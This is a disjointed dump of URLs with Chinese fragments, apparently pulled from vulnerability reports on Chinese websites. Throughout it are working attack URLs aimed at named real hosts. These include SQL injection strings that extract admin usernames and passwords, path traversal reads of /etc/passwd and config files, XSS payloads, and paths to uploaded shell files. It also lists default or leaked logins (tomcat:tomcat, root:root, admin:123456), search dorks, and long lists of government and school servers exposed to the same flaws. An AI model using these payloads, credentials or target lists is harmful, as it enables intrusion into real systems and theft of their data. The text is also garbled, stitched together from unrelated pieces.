http://61.141.21.109/jmx-console/ http://210.35.128.3/jmx-console/ http://210.35.49.30/jmx-console/ http://dzzw.tcjyj.cn:81/jmx-console/ http://61.146.233.170/jmx-console/ http://222.204.116.8/jmx-console/ http://222.204.120.8/jmx-console/ http://www.mzsjy.cn/jmx-console/ http://218.22.29.248/jmx-console/ http://218.22.44.183/jmx-console/ http://218.22.55.247/jmx-console/ http://218.22.181.220/jmx-console/ http://218.22.18.154为案例对象: http://m.ctrip.com/html5/Account/Login.html http://m.ctrip.com http://v2.117go.com/index.php?c=admin&a=main http://cz.bozhou.gov.cn/topic/blue/index.php?ty=1 http://bg.dltour.gov.cn/NetApply/travelpj_login.asp http://bg.dltour.gov.cn/hangyeguanli/shangboatongji/t_hotel_image.asp?lngID=454 http://raxy.gov.cn www.bhxhdanang.gov.vn https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx https://ebooking.ctrip.com http://219.141.62.6/common/login/login_submit.action http://www.lilyren.com//faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://www.whdsjkj.gov.cn/general/download.aspx?path= http://www.100tal.com/ywtx/jiajiaoban/ http://souke.jiajiaoban.com/teachers/index/tuiguang:/teacherid:ff8080812865f0a20128758fb31d2648 http://test.51talk.com/.svn/entries http://tonggao.baidu.com/ http://cn.mall-builder.com/admin/ admin:admin登陆后, http://cn.mall-builder.com/admin/up_db.php http://democn.mall-builder.com/为例, http://democn.mall-builder.com/main.php?m=member&s=admin_member修改个人资料,其中,头像下方的 http://drops.wooyun.org/tips/2562)。 URLhttp://mail.scal.com.cn/mail/admin.nsf/MainPage?OpenPage http://124.127.125.87:9090/Admin 
http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/IO.XSRV2.CallbackList%5B%27lAv4TYdRGBuGTcuo%27%5D/NetValueReturn_Service.NetValueReturnOpen?page=1&num=20&sort=form_start&asc=0&ccode=80000221&type2=0&type3=&%5Bobject%20HTMLDivElement%5D=sjzwy http://124.127.125.70/ http://124.127.125.70/20140226.bak/mobileInterfaceTest/Interface.asmx http://124.127.125.70/20140226.bak/mobileInterfaceTest.rar https://accounts.ctrip.com http://tts7.tarena.com.cn/essay/findCenterByName POST:key=1 http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1 http://china5e.com http://bjxdf.com/pass.php http://182.140.145.96:8081/iimeetclient/index.do http://171.111.157.198/admin.php http://www.hecie.net/admin/ http://www.cmu4h.cn/default/contents/content/i/683 http://www.hjsoft.com.cn/ http://www.hjsoft.com.cn/2525/1040/index.shtml http://60.190.203.25:59999/templates/index/hrlogon.jsp http://ehr.topsearch.com.hk/templates/index/hrlogon.jsp http://221.123.128.41/templates/index/hrlogon.jsp http://hr.bjn3cc.com/templates/index/hrlogon.jsp http://202.205.112.6/templates/index/hrlogon.jsp http://27.112.9.28:8081/templates/index/hrlogon.jsp http://intranet.topsearch.com.hk/templates/index/hrlogon.jsp http://218.64.68.150:8888/templates/index/hrlogon.jsp http://hr.airport.gx.cn:8089/templates/index/hrlogon.jsp http://61.133.218.206:8888/templates/index/hrlogon.jsp http://www.hjsoft.com.cn:8089/(官方在线试用) http://product.tezhongzhuangbei.com/lb.asp?b=24 http://www.tezhongzhuangbei.com/admin/admin_login.asp http://www.tezhongzhuangbei.com/oa/ http://www.tezhongzhuangbei.com/admin/bug/ http://1.192.125.37/hl/mobile_update.aspx?zongji=961991301 http://1.192.125.37/hl/mobile_update.aspx?zongji=961991301 http://218.200.124.71:9090/login.asp http://218.200.124.71:81/ http://111.47.65.11:9090/ http://218.200.124.70/login.aspx http://gs.10010qm.com/searchCy.action http://ha.mail.chinaunicom.cn/login.aspx http://ha.mail.chinaunicom.cn/login.aspx 
http://www.sx-dj.gov.cn/admin/pub_newssearch.asp http://www.bass.gov.cn/manage/login.asp http://222.240.*.***/ www.tftpay.com http://yy.tftpay.com/merchant/merchantLogin!login.action http://zyas.5173.com/service.aspx http://zyas.5173.com/setneedupdate.aspx http://zyas.5173.com/upload163privatekey.aspx http://61.185.224.15/ http://61.185.224.15/ACC_CJCX/ps/grade/cy_queryPage.do http://i.travel.sina.com.cn/interface/travel/channel/json_get_travel_list_by_love_uid.php?t=jsonp&callback=12085&uid=1887467502 www.webluker.com http://my.webluker.com/registration/resetpwd/xxx@163.com/cb4f4106727bc6ac71bcd772b75b4e75 http://my.webluker.com http://222.240.133.53:8080/dpmis/ http://bbs.55.la/thread-1445532-1-1.html http://218.26.97.20:7001/defaultroot/public/edit/admin/default.jsp http://61.191.17.216:7001/defaultroot/public/edit/admin/default.jsp http://220.178.116.78:7001/defaultroot/public/edit/admin/default.jsp http://220.178.41.202:8081/defaultroot/public/edit/admin/default.jsp http://xzwsxx.org/sys_jmda2/ http://www.sqhealth.net/ http://ggws.tzcdc.org/ http://cn.shop-builder.cn/admin/为例,管理员登陆后,向http://cn.shop-builder.cn/admin/up_db.php http://democn.shop-builder.cn/为例,用户注册后,访问 http://democn.shop-builder.cn/main.php?m=member&s=admin_member http://test.com/test.js http://bbs.chinadaily.com.cn/home.php?mod=space&uid=1619413&do=blog&quickforward=1&id=22513 http://117.131.217.25/home/loginNew.action http://117.131.217.25/wooyun.jsp http://tiaoji.mbachina.com/activity/show?id=974 http://fuwu.oppo.com:8899/ http://fuwu.oppo.com:8899/sysadmin/index.asp http://fuwu.oppo.com:8899/sysadmin/search.asp http://fuwu.oppo.com:8899/ http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111 http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/sys/left.jsp?lx=1 http://gzwnq.88ip.cn:9090/security/check.jsp?name=1&id=1 
http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/sys/regListUI.jsp?searchKeyvalue=111 http://220.168.210.109:9090/sys/regUI.jsp?regName=111 http://fsd2014.f3322.org:9090/sys/regUI.jsp?regName=111 http://oa.hzuf.com:9090/sys/regUI.jsp?regName=111 http://gzwnq.88ip.cn:9090/sys/regUI.jsp?regName=111 http://183.129.249.246:9090/sys/regUI.jsp?regName=111 http://116.7.241.29//sys/regUI.jsp?regName=111 http://oa.shunhengli.com:9090/sys/regUI.jsp?regName=111 http://oa.chnjcdc.com:9090/sys/regUI.jsp?regName=111 http://115.29.234.197:8090/sys/regUI.jsp?regName=111 http://119.145.194.122:9090/sys/regUI.jsp?regName=111 http://220.168.210.109:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://fsd2014.f3322.org:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.hzuf.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://gzwnq.88ip.cn:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://183.129.249.246:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://116.7.241.29//sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.shunhengli.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://oa.chnjcdc.com:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://115.29.234.197:8090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://119.145.194.122:9090/sys/plugin/plugin_form_edit.jsp?done=&key=a http://220.168.210.109:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://fsd2014.f3322.org:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://oa.hzuf.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://gzwnq.88ip.cn:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://183.129.249.246:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://116.7.241.29//permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://oa.shunhengli.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 
http://oa.chnjcdc.com:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://115.29.234.197:8090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://119.145.194.122:9090/permissionsreport/pMonitor.jsp?photoId=1&modelid=111 http://222.178.179.20/login/validate_yhgl.do www.sino-manager.com/Pages/administrate1/CeoTableMg.aspx http://www.maticsoft.com/shop.aspx http://shop1.maticsoft.cn/ http://shop1.maticsoft.cn/Upload/AD/34/201306251621094269405.jpg http://shop1.maticsoft.cn/SNS/Group/Create,创建是选择一个正常文件上传后保存。 http://www.xyiz.gov.cn/ http://sme.ujs.edu.cn/ http://118.123.221.150/ http://118.123.221.150/info.php http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1 http://oa.hzuf.com:9090/common/selectMoreOrganizeTree.jsp?id=1 http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=11 http://oa.hzuf.com:9090/carManager/carUseDetailList.jsp?CAR_BRAND_NO=1 http://gzwnq.88ip.cn:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.hzuf.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.shunhengli.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://119.145.194.122:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://115.29.234.197:8090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://220.168.210.109:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://saip888.ufyct.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://www1.elkay.com.cn:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://oa.chnjcdc.com:9090/fenc/syncbasedoc.jsp?pk_corp=1111&opt=sync http://gzwnq.88ip.cn:9090/document/file_publish_open.jsp?id=1 http://oa.hzuf.com:9090/document/file_publish_open.jsp?id=1 http://oa.shunhengli.com:9090/document/file_publish_open.jsp?id=1 http://119.145.194.122:9090/document/file_publish_open.jsp?id=1 http://115.29.234.197:8090/document/file_publish_open.jsp?id=1 
http://220.168.210.109:9090/document/file_publish_open.jsp?id=1 http://saip888.ufyct.com:9090/document/file_publish_open.jsp?id=1 http://www1.elkay.com.cn:9090/document/file_publish_open.jsp?id=1 http://oa.chnjcdc.com:9090/document/file_publish_open.jsp?id=1 http://gzwnq.88ip.cn:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.hzuf.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.shunhengli.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://119.145.194.122:9090/fenc/ncsubjass.jsp?subjcode=1 http://115.29.234.197:8090/fenc/ncsubjass.jsp?subjcode=1 http://220.168.210.109:9090/fenc/ncsubjass.jsp?subjcode=1 http://saip888.ufyct.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://www1.elkay.com.cn:9090/fenc/ncsubjass.jsp?subjcode=1 http://oa.chnjcdc.com:9090/fenc/ncsubjass.jsp?subjcode=1 http://www.mailer.com.cn/Products6.html http://sklnbd.bjmu.edu.cn//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://prob.csu.edu.cn/ http://prob.csu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 http://3z.xinhui.gov.cn/navigate.do?method=getSubMenuContent&id=8432&menuno=03 http://3z.kaiping.gov.cn/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05 http://zsjypt.cwgk.net/navigate.do?method=getPolicyinfoDataById&id=1036&menuNo=07 http://61.145.9.94:8000/navigate.do?method=getPolicyinfoDataById&id=567&menuNo=05 http://3zhs.cwgk.net:8081/navigate.do?method=countentById&id=257&tabelname=policyinfo&menu=85 
http://3z.doumen.gov.cn:8080/navigate.do?method=getDetailContent&id=1680&menuNo=05 http://www.eydcb.cn/blue_show.aspx?paperName=%E7%87%95%E9%83%BD%E6%99%A8%E6%8A%A5&qnum=2714 http://zsjggw.xnu.edu.cn/blue_show.aspx?paperName=%e6%b9%98%e5%8d%97%e5%ad%a6%e9%99%a2%e6%8b%9b%e7%94%9f%e7%ae%80%e7%ab%a0&qnum=2014 http://p.xyhuatai.com/blue_show.aspx?paperName=%E5%92%B8%E9%98%B3%E5%8D%8E%E6%B3%B0%E5%86%85%E5%88%8A&qnum=2013058 http://p.hsort.com/blue_show.aspx?paperName=%E4%BB%8A%E6%97%A5%E9%9D%92%E5%B7%9D%E6%95%B0%E5%AD%97%E6%8A%A5%EF%BC%8C%E7%94%B5%E5%AD%90%E6%8A%A5&qnum=1 http://p.xyhuatai.com/blue_show.aspx?paperName= http://xue.fmx.cn/common/daohang.php?t_id=2 http://workspace.ec-ae.com/wiki/index.php wangyan:326459 http://scm.ec-ae.com/platform/branches/current http://scm.ec-ae.com/ecaepartner/branches/current http://app.ec-os.net/svn/hudsonecae/trunk/health_check http://scm.ec-ae.com/www/trunk http://t1.fanwe.net:85/index.php?action=index&hot=5 http://ichtf.dbw.cn/dhcx/browse/download_10_web.php?id=28423 http://www.zt56.com.cn:8081/*****/haoma.jsp inurl:case.php http://www.riyaozs.com/case.php?action=detail&id=165&sortid=10 http://www.qdbast.com/case.php?sortid=4&id=128 http://www.qdmgml.com/case_detail.php?id=56 http://www.qingdaozhn.com/case_detail.php?id=186 http://tianzhengjiaye.com/case_detail.php?id=44 http://www.ssjs-china.com/case.php?id=35&action=detail http://www.jhdgyp.com/case.php?id=7&action=detail http://www.sdjiesen.com/case_detail.php?id=1099 http://www.whhuajin.com/case.php?sortID=&id=76 http://www.water-green.com/case_detail.php?id=73 http://www.yiqiangyuan.com/case.php?sortID=4&act=detail&id=32 http://www.qdhuirui.com/case.php?sortID=11&act=detail&id=20 http://www.water-green.com/case_detail.php?id=11 SID:drcom http://182.48.103.188:9080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf http://v.youku.com/v_show/id_XNzc1MTczMjM2.html url:http://221.232.145.230:80/manager/html user:tomcat pass:tomcat 
http://oa.zwcad.com/defaultroot/custom_form/smartUpload.jsp?path=innerMailbox&mode=add&fileName=innerMailFileName&saveName=innerMailSaveName&tableName=innerMaildisplaytable&fileMaxSize=0&fileMaxNum=0&fileType=&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://youth.xupt.edu.cn/ inurl:geren_list_page.aspx http://qlgk.taixing.gov.cn/index_page/geren_list_page.aspx?server=1&refid= http://qlgk.taixing.gov.cn/index_page/geren_list_page.aspx?server=1'&refid= http://www.upp.cn:8084/wap/show_article.jsp?id=012968 http://zsks.rajyj.com/show1.asp?id=4130 http://210.26.24.26/WebCenterST/admin/login.action http://oa.bdgslz.com/sysoa/admin/Manage.aspx?pkid=4424&job=4421 http://116.252.82.204/main.do http://www.jhun.edu.cn/gcontent.asp?id=109979 content://com.speedsoftware.rootexplorer.content/ content://com.speedsoftware.rootexplorer.content/etc/hosts,发请求后就可以读取/etc/hosts的文件内容。 http://222.178.243.43/admin/login.aspx http://shydj.gaoyou.gov.cn/admin/login.asp?action=logout http://www.jjjtj.gov.cn/hwcrm/login.php http://www.tzjsda.gov.cn/hwcrm/login.php http://www.dyinfo.gov.cn/backstage/login.asp http://zmhd.xianfeng.gov.cn/gldl/login.asp http://www.jzssfj.gov.cn/system/login.aspx http://www.ahwst.gov.cn:8011/xnjs/login.asp http://job.ccqrsj.gov.cn/admin/login.aspx http://www.jjlib.gov.cn/admin/index.php https://60.10.19.155/user/requireLogin https://59.45.93.20/user/requireLogin https://115.182.84.68/user/requireLogin http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZw http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Speed=10.3125G http://eapa.eegmusic.com/ http://eapa.eegmusic.com/download.php?path=upload/../../../../../../../../etc/passwd inurl:newsDetail.asp?id= http://www.sz-henry.com/NewsList.asp?ID=21*&classid=1 http://www.youyazx.com/newsDetail.asp?id=135 http://www.szghzdh.com/newsDetail.asp?id=52 http://www.wjmingde.com/newsDetail.asp?id=70 http://www.szwater120.com/newsDetail.asp?id=71&classID=1 http://ynxd56.com/login.do 
inurl:appellate/appellate.do url:appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://tx12345.tx.gov.cn/txwsxf/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://122.224.76.165/xcwsxf/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://www.xiaoshan.gov.cn:9080/xswsxf/appellate/appellate.do http://szxx.lx.gov.cn/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://220.191.220.84/jxszxx/appellate/appellate.do?act=queryByPWD&jlbh=1&querypwd=1 http://www.hzxf12345.gov.cn/appellate/appellate.do http://www.xcrfb.gov.cn/include/content.php?id=52 http://183.203.21.86:8086/yiyahars_hospital/dept/index?hospId=6 http://pk.music.9you.com/ http://pk.ent.9you.com/front_aboutus.php?about_id=1 http://bizchina.chinadaily.com.cn/uarticle.shtml?id=69494 http://blog.chinadaily.com.cn/photo.php?bid=82%20%27&lanmu=Focus%20on%20China&mod=list http://career.chinadaily.com.cn/list.shtml?Curp= http://www.xanet.net/case.php inurl:inurl:homeLogin.action inurl:xxsearch.action www.xxx.com http://www.xxx.com http://www.biad.com.cn/cenep/biad/common/zpzs/biaoti.aspx?flag=nd&begin=2006&end=2020 http://xp.chinanetcenter.com/ http://120.198.232.44:8090/smartdns/loginPortal.action http://app1.chinadaily.com.cn/appdesk/vote/survey_comment_show.shtml?stid=1058%27 http://www.zzxfj.gov.cn/)上按如下图操作即可验证上图链接的真实性 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=3 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=4 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=5 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=6 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=7 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=8 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=17 http://218.28.253.38:90/ResponseUrl.aspx?DEPTGUID=17,而DEPTGUID存在注入 url:http://218.70.18.59:9011/Login.aspx http://tiaoji.mbachina.com/wenda/posts/reply?id=762 http://tiaoji.mbachina.com/activity/show?id=974 http://www.math.zju.edu.cn/upload/LOGIN.ASP bhz.tangxian.gov.cn/xinxigongkai.asp 
www.txzfjsj.gov.cn/xinxigongkai.asp www.txgdj.com/xinxigongkai.asp www.txws.gov.cn/xinxigongkai.asp www.txzjj.gov.cn/xinxigongkai.asp www.txhjbhj.gov.cn/xinxigongkai.asp www.txgsj.gov.cn/xinxigongkai.asp www.txnyj.gov.cn/xinxigongkai.asp http://www.txzjj.gov.cn/xinxigongkaiinfo.asp?ID=06E3948C-686E-488C-BDD5-E8DB7674E924 http://www.tchjbh.gov.cn/ http://www.tchjbh.gov.cn/www.zip http://www.yuanping.gov.cn/templet/display.php?id=5623 http://www.baidu.com/img/baidu_sylogo1.gif http://kf.meizu.com/login.php http://www.jl-n-tax.gov.cn/index_ww/ssxcy//list.jsp?i_content_sort=1544 http://www.jl-n-tax.gov.cn/index_ww/ssxcy//list.jsp?i_content_sort=1544 http://www.syftyy.com/default/contents/content/i/204 http://nba.weibo.com/ http://www.cms.zju.edu.cn/news.asp?id=954 http://www.u591.com/sw/news.php?id=2364 http://down.admin5.com/php/105478.html http://www.duote.com/soft/109798.html http://wlkc.nbdhyu.edu.cn:8080/phpmyadmin/ username:root password:root http://www.qhdgsj.gov.cn/manage/login.asp http://www.qhdgsj.gov.cn/manage/ http://218.25.82.237/ewl/excel_model/download.jsp?filepath=../../../../../../../../../../../etc/passwd http://218.25.82.237/ewl/system_manage/ http://sjwzr.wzu.edu.cn/list.aspx?id=36 http://tech.sina.com.cn/it/2013-06-15/07188442066.shtml http://www.jyyyw.com/index.php?word=%E6%8B%9B%E8%81%98&tid=949%2C391%2C392%2C393&a=search&c=article&button2=+ http://club.wacom.cn/member/postwork.aspx http://ichuguo.chinadaily.com.cn/article/index/aid/17584915 ichuguo.chinadaily.com.cn/article/index/aid/17584915* https://zzxs.moe.edu.cn/login.do https://zzxs.moe.edu.cn/console/viewStudentMain.do?stid=144914962&schoolid=8079 http://www.jngp.gov.cn/index.action http://zpdc.gdep.com.cn:82/phpmyadmin/ http://221.179.6.108:8004/Login.aspx http://cloud.video.taobao.com/videoapi/auth.php http://cloud.video.taobao.com/videoapi/auth.php http://122.225.117.132:81/FTP/Pic www.153.cn:8081 http://221.179.6.108/ http://121.22.25.5/,居然连域名都没有 http://www.gd189fq.com/goods.php?id=87 
https://fssj.ynf.gov.cn/sjpt/login.action http://221.179.6.136:8080/ http://struts.apache.org/release/2.3.x/docs/s2-016.html http://g.hn165.com/active/online/0806/index.html http://218.61.60.218/productadmin2/ckfinder/userfiles/frame/hn.html http://**.**.** admin:admin弱口令登录成功。 http://**.**.** http://chl.sxfpay.cn/login.action http://tianjinrd.sinosteel.com/index.asp http://tianjinrd.sinosteel.com/kjzjs.asp?id=36 http://fangtan.eduu.com/i/2526581 http://fangtan.eduu.com/i/3043854(请管理员删除) http://eoffice.sccm.cn/building/urlurl.php http://eoffice.sccm.cn/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 http://www.xunje.com/jiemian.htm http://yanshi.xunje.com/mv.aspx?movieID=71a8e0b8-384e-4d87-a3ee-a8f327cf7446 http://www.xunje.cn/mv.aspx?movieID=3f18d303-6ab1-4545-b4e6-9c44f17fdac7 http://112.85.215.186/turn.aspx?movieID=9fb3f41b-4718-4b85-bd49-1a2282cdb0e0 http://dy.nc169.com:8088/turn.aspx?movieID=ea671cc2-2e36-4016-a34e-d07a2cb3bdbd http://bd.wangbadianying.com/mv.aspx?movieID=2984be84-6aa1-4128-ab7b-47d5098dfc1c http://218.22.185.18:8000/turn.aspx?movieID=b1ebe74d-75bb-41f1-8238-9a93ef15f634 http://www.tz9158.com/turn.aspx?movieID=daaa5ca1-a7bc-4d90-a8fd-1c40b82f46a1 http://tz9158.com/turn.aspx?movieID=3eed3dcb-42d2-4f81-a963-65fbe57b87ce http://bbs.share.youku.com。 http://bbs.share.youku.com/home.php?mod=space&uid=1 http://xiaoyou.zhumeng365.net http://192.168.1.1/js/forbidView.js里 http://www.dxcs.gov.cn http://nbhsfy.gov.cn http://xs.nbtravel.gov.cn http://oa.nbdpri.gov.cn http://www.dsjd.gov.cn http://volunteer.nbcg.gov.cn http://nbyx.org.cn http://www.sinochem-nb.com/UserInfo/files.aspx http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower'&px=asc&Curpage=1&mtype=&stype= http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower&px=asc&Curpage=1&mtype=&stype= 
http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=%3C/title%3E%3Cscript%3Ealert%28%29%3C/script%3E%3Ctitle%3E http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark= http://member.china-pub.com/member/mypub/Handdle/DelMarks.ashx?id=1591 http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark= http://www.eastfair.com/fair/admin/login_sys.asp http://119.254.81.197:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://61.191.17.216:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://oa.gxfz.org:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://222.178.221.54:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://www.zkyxls.com/index.php/Art/show?i=5959其中的参数i是注入点。注入点证明信息如下: http://law.szu.edu.cn/news_Article.asp?ClassCode=00020001&ArticleID=2322 http://jinzhong.szu.edu.cn/jz/Website.jsp?t=3&news_id=20140625101445 http://norc.szu.edu.cn/Website.jsp?t=3&cid=10000&clid=10003&nid=20140811121319 http://renmai.weibo.com/ http://wan.7k7k.com/login.php http://202.109.244.108:8086/xmkjzc/wsbbAction!register.xhtml http://sdb.csdl.ac.cn/mycscd/view/m06/A0600.xhtml http://www.tyut.edu.cn/wuli/ooe/common.asp?id=16 http://202.115.133.161/ http://e.tju.edu.cn/Service/serviceBrowse.do?class_id=04 http://localhost/test/maccms/index.php?m=user-save.html http://beijing.homelink.com.cn/cmsmanage/ site:bjfu.edu.cn http://202.204.115.67/xueshengxinxichaxun/search.htm学生信息查询,确认是她本人,新闻上说10年入学园林专业。 site:bjfu.edu.cn http://info.bjfu.edu.cn的初始密码为身份证前六位或八位,脚本跑了一遍发现返回大小都一样,不是她改过密码就是我没办法判断返回正确。放弃之。 http://61.136.82.103:8080/ http://www.chuanke.com/1440953-99413.html https://pay.chuanke.com/st/PrePay?r=1410187027 http://www.chuanke.com/?mod=quiz&act=quizlib&do=create http://114.112.70.243/ http://www.stats.gov.cn/ http://116.228.55.143:9002/Home/Index# id:admin pass:123456 http://bbs.rom.baidu.com/ http://www.mod.gov.cn/ http://imgcdn.house.sina.com.cn/jquery.js/1.php 
http://itbbs.pconline.com.cn/bbs/51747686.html http://yunjiasu.baidu.com/analytics/summary_report/?filter_site=im286.com http://bm.mbachina.com/wenda/posts/reply?id=678%E2%80%98 http://user.mbachina.com/wenda/posts/reply?id=167%27 http://202.106.159.90/app/jsp/member/sinoform/memberRegistration.jsp?formId=2011082723132377981 http://202.106.159.93/app/jsp/member/sinoform/memberRegistration.jsp http://202.106.159.90/affixPath/affixDIR/photo/1410234270278/1.jsp http://www.polytheatresz.com/ http://www.fcchbj.com/ http://www.polytheatre.com/ http://www.dgyldjy.com/ http://www.polytheatre.com/search http://app.juesheng.com/member/yctiku.php?app=yctktk&tid=37 http://www.fymjjj.com/ http://www.pop1st.com/ http://www.jingzhipeng.com/ http://www.canakkale.com.cn/ http://www.unotimes.com/ http://www.athink.org/ http://www.bcghotel.com/ http://www.zcdiamond.com/ http://guanghua365.com/ http://www.samewayart.cn/ http://www.lc787.com/case.html http://mba.xju.edu.cn/ http://cs.ganji.com/fuwu_dian/1141783323x/cuxiao/31701/ http://wuxi.eda.ac.cn/chat/change_nickname.php页面的cookie中的sessionid参数 http://www.ah165.net/shop/ http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a http://www.ptsn.net.cn/ http://www.ccsa.org.cn/ http://mail.ptsn.net.cn http://webmail.ccsa.org.cn/ http://www.tlc.com.cn/ http://www.tc485.cn/ http://www.ptsn.net.cn/phpMyAdmin/ http://www.ccsa.org.cn/recorder/display.php?id=726 http://www.ccsa.org.cn/recorder/display.php?id=726 inurl:TransactList.aspx?ItemName= inurl:broadcastview.aspx?InfoId= inurl:OnlineQuery/QueryList.aspx http://www.whsfzb.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.ytshenpi.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.rcsp.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.lcxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.xtsxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 
http://www.qjxzsp.com/langchao.ecgap.outportal//Broadcast/displayNewsPic.aspx?id=00187 http://www.wdaac.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.sdsp.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.shspzx.gov.cn//Broadcast/displayNewsPic.aspx?id=00187 http://222.135.78.34:8089//Broadcast/displayNewsPic.aspx?id=00187 http://www.dftzfw.cn/waiwang//Broadcast/displayNewsPic.aspx?id=00187 http://shenpi.xuchang.gov.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.hdamo.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://221.176.217.34/szrx//Broadcast/displayNewsPic.aspx?id=00187 http://www.e.lfang.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://xzsp.jianggan.gov.cn:8080/Broadcast/displayNewsPic.aspx?id=00187 http://zmdxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://shenpi.changge.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://xzfw.ningde.gov.cn/Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=user http://localhost/admin.php?mod=admin&act=add Http://192.168.1.120/1.html http://localhost/admin.php?mod=admin&act=add 